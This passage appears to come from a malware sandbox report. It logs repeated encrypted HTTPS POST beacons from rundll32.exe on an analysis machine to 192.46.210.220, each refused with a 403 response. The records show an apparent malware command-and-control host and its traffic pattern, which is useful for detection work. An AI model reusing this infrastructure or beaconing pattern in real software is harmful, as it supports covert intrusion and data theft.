                                                                                                        2021-10-28 03:00:10 UTC319OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:00:10 UTC329INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:00:10 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        65192.168.2.650089192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:00:10 UTC324OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:00:10 UTC324OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:00:11 UTC329INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:00:11 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        66192.168.2.650095192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:00:14 UTC329OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:00:14 UTC329OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:00:14 UTC334INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:00:14 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        67192.168.2.650097192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:00:14 UTC334OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:00:14 UTC334OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:00:15 UTC339INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:00:15 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        68192.168.2.650103192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:00:17 UTC339OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:00:17 UTC339OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:00:18 UTC344INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:00:18 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        69192.168.2.650105192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:00:18 UTC344OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:00:18 UTC344OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:00:19 UTC349INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:00:19 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        7192.168.2.649781192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:58:15 UTC34OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:58:15 UTC35OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:58:15 UTC39INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:58:15 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        70192.168.2.650111192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:00:21 UTC349OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:00:21 UTC349OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:00:22 UTC354INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:00:22 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        71192.168.2.650113192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:00:22 UTC354OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:00:22 UTC354OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:00:23 UTC359INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:00:23 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        72192.168.2.650119192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:00:25 UTC359OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:00:25 UTC359OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:00:26 UTC364INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:00:26 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        73192.168.2.650121192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:00:26 UTC364OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:00:26 UTC364OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:00:27 UTC369INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:00:27 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        74192.168.2.650127192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:00:29 UTC369OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:00:29 UTC369OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:00:30 UTC374INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:00:30 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        75192.168.2.650129192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:00:30 UTC374OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:00:30 UTC374OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:00:31 UTC379INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:00:31 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        76192.168.2.650135192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:00:33 UTC379OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
